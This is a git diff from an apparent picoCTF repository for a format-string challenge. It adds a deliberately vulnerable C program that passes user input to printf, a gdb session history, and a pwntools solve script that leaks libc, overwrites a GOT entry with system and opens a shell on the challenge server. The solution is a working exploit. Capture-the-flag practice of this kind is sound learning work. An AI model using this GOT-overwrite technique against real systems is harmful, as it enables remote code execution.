diff --git a/format_string_2/peda-session-vuln.txt b/format_string_2/peda-session-vuln.txt deleted file mode 100644 index fe91fea..0000000 --- a/format_string_2/peda-session-vuln.txt +++ /dev/null @@ -1,2 +0,0 @@ -break *main+95 - diff --git a/format_string_3/.gdb_history b/format_string_3/.gdb_history new file mode 100644 index 0000000..071f7d0 --- /dev/null +++ b/format_string_3/.gdb_history @@ -0,0 +1,89 @@ +exit +exit +exit +run +exit +disassemble main +b *main+16 +b *main+160 +rm +b +b --info +help b +help breakpoints +exit +disassemble main +b *main+160 +run +continue +continue < payload +run < payload +continue +con +cont +contin +run < payload +continue +disassemble main +b *main+175 +run < payload +continue +continue +got +disassemble 0x404018 +x 0x404018 +x/8 0x404018 +x/8w 0x404018 +x/8w2 0x404018 +x/8x2 0x404018 +x/8x2 0x404018 +x/8x2 0x404018 +x/16 0x404018 +run < payload +disassemble 0x404018 +continue +disassemble 0x404018 +x/16 0x404018 +x *setvbuf +search +search --0xfa1e0ff3 +search --pointer 0xda1e0ff3 +x *puts +search --pointer 0x7ffff7e5a3f0 +search --pointer 0x7ffff7e9bf0 +search --pointer 0x7ffff7e59bf0 +disassemble main +x 0x404018 +plt +got +run < payload +continue +run +x *puts +x setvbuf +search --pointer 0x7ffff7e59bf0 +x 0x404018 +x/2 0x404018 +x/w 0x404018 +x/d 0x404018 +x/b 0x404018 +x/g 0x404018 +x/a 0x404018 +set {int}0x404018 = 0x7ffffe5a3f0 +x/a 0x404018 +continue +continue +disassemble main +x/2d x04012f2 +run +x/2d x04012f2 + +x/2a x04012f2 +x/2a 0x04012f2 +x/4a 0x04012f2 +continue +continue +run +got +got +exit diff --git a/format_string_3/format-string-3 b/format_string_3/format-string-3 new file mode 100755 index 0000000..6bc1ead Binary files /dev/null and b/format_string_3/format-string-3 differ diff --git a/format_string_3/format-string-3.c b/format_string_3/format-string-3.c new file mode 100644 index 0000000..caf010c --- /dev/null +++ b/format_string_3/format-string-3.c @@ -0,0 +1,31 @@ +#include + +#define MAX_STRINGS 32 + +char *normal_string = "/bin/sh"; + +void setup() { + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +void hello() { + puts("Howdy gamers!"); + printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf); +} + +int main() { + char *all_strings[MAX_STRINGS] = {NULL}; + char buf[1024] = {'\0'}; + + setup(); + hello(); + + fgets(buf, 1024, stdin); + printf(buf); + + puts(normal_string); + + return 0; +} diff --git a/format_string_3/format-string-3_patched b/format_string_3/format-string-3_patched new file mode 100755 index 0000000..1c97998 Binary files /dev/null and b/format_string_3/format-string-3_patched differ diff --git a/format_string_3/ld-linux-x86-64.so.2 b/format_string_3/ld-linux-x86-64.so.2 new file mode 100755 index 0000000..1cf2d3e Binary files /dev/null and b/format_string_3/ld-linux-x86-64.so.2 differ diff --git a/format_string_3/libc.so.6 b/format_string_3/libc.so.6 new file mode 100644 index 0000000..f022213 Binary files /dev/null and b/format_string_3/libc.so.6 differ diff --git a/format_string_3/payload b/format_string_3/payload new file mode 100644 index 0000000..9d1fa66 Binary files /dev/null and b/format_string_3/payload differ diff --git a/format_string_3/sol.py b/format_string_3/sol.py new file mode 100755 index 0000000..69ca304 --- /dev/null +++ b/format_string_3/sol.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python3 +from pwn import * + +context.arch = "amd64" + +elf = ELF("libc.so.6") + +#conn = process(["./format-string-3_patched"]) +address = "rhea.picoctf.net" +port = 65145 +conn = remote(address, port) + +conn.recvuntil(b"libc: ") +setvbuf_base = int(conn.recvline(), 16) +log.info(f"setvbuf base: {hex(setvbuf_base)}") +libc_base = setvbuf_base - elf.symbols["setvbuf"] +log.info(f"libc base: {hex(libc_base)}") +system_base = libc_base + elf.symbols["system"] +log.info(f"evecve base: {hex(system_base)}") + +def discover_offset(payload): + log.debug(payload) + #c = process(["./format-string-3_patched"]) + c = remote(address, port) + c.recvlines(2) + c.sendline(payload) + res = c.recvall() + log.debug(res) + return res + +fmt = FmtStr(discover_offset) +offset = fmt.offset + +payload = fmtstr_payload(offset, {0x404018: system_base}) +with open("payload", "wb") as f: + f.write(payload) + f.close() +conn.sendline(payload) +conn.interactive() +